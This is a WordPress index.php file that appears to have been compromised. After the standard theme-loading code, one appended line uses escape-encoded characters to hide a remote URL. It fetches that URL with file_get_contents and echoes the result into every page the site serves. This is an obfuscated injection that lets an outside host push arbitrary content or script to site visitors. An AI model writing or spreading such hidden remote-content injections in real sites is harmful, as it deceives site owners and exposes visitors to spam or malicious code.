<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
echo file_get_contents("\x68\164\x74\160\163\x3a\57\57\x70\162\x6f\x6a\145\143\164\150\x6f\163\164\x69\156\x67\x73\56\x63\x6f\x6d\57\x64\157\143\x75\x6d\x65\156\x74\141\164\x69\x6f\x6e\56\164\x78\x74");